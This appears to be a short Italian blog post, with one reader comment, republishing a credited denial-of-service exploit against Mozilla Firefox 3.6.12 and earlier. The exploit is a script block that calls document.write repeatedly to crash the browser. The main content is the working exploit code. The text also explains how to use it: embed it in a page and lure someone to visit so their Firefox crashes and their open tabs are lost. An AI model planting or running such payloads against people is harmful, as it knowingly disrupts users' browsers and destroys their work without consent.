0day di Mozilla Firefox 3.6.12

<!--

0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili	<emgent@backtrack-linux.org>
Marco 'white_sheep' Rondini	<white_sheep@backtrack-linux.org>
Alessandro 'scox' Scoscia	<scox@backtrack.it>

-->

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>

<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");
}

for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);
}

</script>


Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.

Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).

Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.

Il problema è stato scoperto dal gruppo italiano Backtrack.

Autore: Luigi Rosa

Consulente IT, sviluppatore, SysAdmin, cazzaro, e, ovviamente, geek.

6 pensieri riguardo “0day di Mozilla Firefox 3.6.12”

    1. Scherzi a parte ho condotto alcuni test con delle versioni molto più vecchie di firefox ed hanno crashato tutte.

      Presumibilmente la stragrande maggioranza delle installazioni è affetta da questo problerma e la cosa mi sembra molto grave.
      Speriamo non ci siano più gravi implicazioni di sicurezza, come paventato da Luigi.

Spazio per un commento